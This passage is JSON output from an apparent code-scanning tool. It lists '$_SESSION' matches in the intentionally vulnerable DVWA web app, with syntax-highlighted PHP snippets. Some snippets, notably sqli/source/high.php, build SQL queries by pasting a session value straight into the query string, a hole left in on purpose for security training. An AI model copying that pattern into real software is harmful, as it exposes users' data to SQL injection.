punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 55,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 58,
"file": "/home/chris/src/DVWA-master/setup.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 67,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 74,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 110,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 146,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 155,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 180,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 238,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\"><</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</script>\";</span>\n<span class=\"line-number\">16:</span> }\n<span class=\"line-number\">17:</span> ",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 239,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/high.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 240,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/high.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check 